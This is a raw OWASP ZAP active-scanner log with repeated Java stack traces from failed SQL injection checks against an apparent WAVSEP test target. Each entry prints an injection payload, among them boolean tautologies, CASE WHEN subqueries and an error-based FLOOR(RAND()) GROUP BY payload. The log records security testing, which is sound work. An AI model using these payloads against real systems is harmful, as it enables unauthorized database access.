org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681215 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 7035=2013 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 7035=2013 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681216 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 8189=4057 AND 'uavl'='uavl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 8189=4057 AND 'uavl'='uavl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681217 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2098=5594-- jgUC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 2098=5594-- jgUC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681218 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4010=2827 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4010=2827 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681219 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 7429=7429 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 7429=7429 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681219 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7855=7855-- Ylwt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 7855=7855-- Ylwt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681220 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4010=2827 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4010=2827 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681220 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2098=5594-- jgUC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 2098=5594-- jgUC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681222 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4371=3821-- byep] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4371=3821-- byep at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681222 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9710=3470) THEN 9710 ELSE 9710*(SELECT 9710 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (9710=3470) THEN 9710 ELSE 9710*(SELECT 9710 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681223 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6451=6451) THEN 6451 ELSE 6451*(SELECT 6451 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (6451=6451) THEN 6451 ELSE 6451*(SELECT 6451 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681223 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8745=8745-- Qyxx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8745=8745-- Qyxx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681225 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9710=3470) THEN 9710 ELSE 9710*(SELECT 9710 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (9710=3470) THEN 9710 ELSE 9710*(SELECT 9710 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681225 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4371=3821-- byep] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4371=3821-- byep at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681226 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT 7701 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7701=7701,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7514=7514] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND (SELECT 7701 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7701=7701,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7514=7514 